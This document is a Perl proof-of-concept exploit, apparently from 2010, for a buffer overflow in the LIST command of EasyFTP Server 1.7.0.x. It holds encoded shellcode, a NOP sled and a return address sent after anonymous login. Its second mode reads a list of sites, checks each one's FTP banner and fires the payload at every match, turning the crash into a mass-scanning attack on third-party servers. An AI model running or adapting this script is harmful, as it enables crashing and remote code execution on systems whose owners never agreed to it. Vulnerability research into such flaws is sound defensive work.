sub banner { print q { ########################################################################################################## # # # [*] PoC EasyFTP 1.7.0.X Crash # # # # [*] Author: Fernando Mengali # # # # [*] e-mail: fernando.mengalli@gmail.com # # # # [*] Date: 18/10/2010 # # # # [*] Version Vulnerable: # # # # - EasyFTP Server 1.7.0.11 EN # # # # - EasyFTP Server 1.7.0.2 EN # # # # # # # # [*] System Operacional Tested: # # # # - Windows XP PACK 3 Brazilian # # # # # # # # # # - EasyFTP Server 1.7.0.2 => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip # # # # - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip # # # # # ###############################Code Exploit ############################################################## } } #!usr/bin/perl use strict; use IO::Socket; use IO::Socket::INET; if (!$ARGV[0]) { &banner(); print q { Options: [1] - Test Exploit [2] - Test ScanXploit } } print " [+] Options: "; our $option = ; chomp ($option); if ($option == 1) { my $portTest ="21"; my $hostTest="127.0.0.1"; my $usuarioTest ="anonymous"; my $senhaTest = "adminadmin"; # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ] my $shellCodeTest = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28"); my $nopsTest = ("\x90" x 40); my $retornoTest = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest; my $AutenticarTest = ("\x55\x53\x45\x52\x20" . $usuarioTest . "\r\n" . "\x50\x41\x53\x53\x20 " . $senhaTest . "\r\n" . "LIST " . $PayloadTest . "\r\n" ); my $socketTest = new IO::Socket::INET (PeerAddr => $hostTest,PeerPort => $portTest,Proto => 'tcp',); die " [x] Error: $!\n" unless $socketTest; print $socketTest $AutenticarTest; close($socketTest); sleep(2); our $soquetes = IO::Socket::INET->new("$hostTest:$portTest"); if($soquetes) { print " [-] Server no exploited \n"; } else { print " [+] Server Exploited\n"; } } ################################## ScanXploit ############################################################################################# if ($option == 2) { print " [+] Digite o nome da lista de sites, exampl,: lista.txt: "; our $lista = ; chomp ($lista); open( SITE, "< $lista" ) or die( " [-] Could not open file: $!" ); our @array = ; our $numero = $#array; for (our $i = 0; $i <= $numero; $i++) { our $Url = "$array[$i]"; if($Url !~ /http:\/\//) { $Url = "http://$Url"; } our $Stop = index($Url,":"); our $Protocolo = substr($Url,0,$Stop); our $Start = index($Url,"//") + 2; our $Dominio = substr($Url,$Start); our $Stop = index($Dominio,"/"); our $Dominio = substr($Dominio,0,$Stop); our $Start = rindex($Url,"/") + 1; our $NomeArq = substr($Url,$Start); our $Compr_Url = length($Url); our $ponto = "$Dominio \n"; our @portas = "21"; foreach our $porta (@portas) { our $sock = IO::Socket::INET->new("$ponto:$porta"); if($sock) { our $remote = IO::Socket::INET -> new (Proto => "tcp", PeerAddr => $ponto, PeerPort => $porta, Timeout => "7"); our $line = <$remote>; if ($line =~ "BigFoolCat") { my $usuario ="anonymous"; my $senha = "adminadmin"; # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ] my $shellCode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28"); my $nops = ("\x90" x 40); my $retorno = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $Payload = $nops . $shellCode . $retorno; my $Autenticar = ("\x55\x53\x45\x52\x20" . $usuario . "\r\n" . "\x50\x41\x53\x53\x20 " . $senha . "\r\n" . "LIST " . $Payload . "\r\n" ); our $socket = new IO::Socket::INET (PeerAddr => $ponto,PeerPort => $porta,Proto => 'tcp',); die "[x] Error: $!\n" unless $socket; print $socket $Autenticar; close($socket); } sleep(2); our $soquete = IO::Socket::INET->new("$ponto:$porta"); if($soquete) { print " [-] Server no exploited \n"; } else { print " [+] Server Exploited\n"; } } } } print " [+] Servers tested: $numero \n"; } if ($option != 1 && $option != 2 ) { print " [+] Option invalid \n\n"; } exit;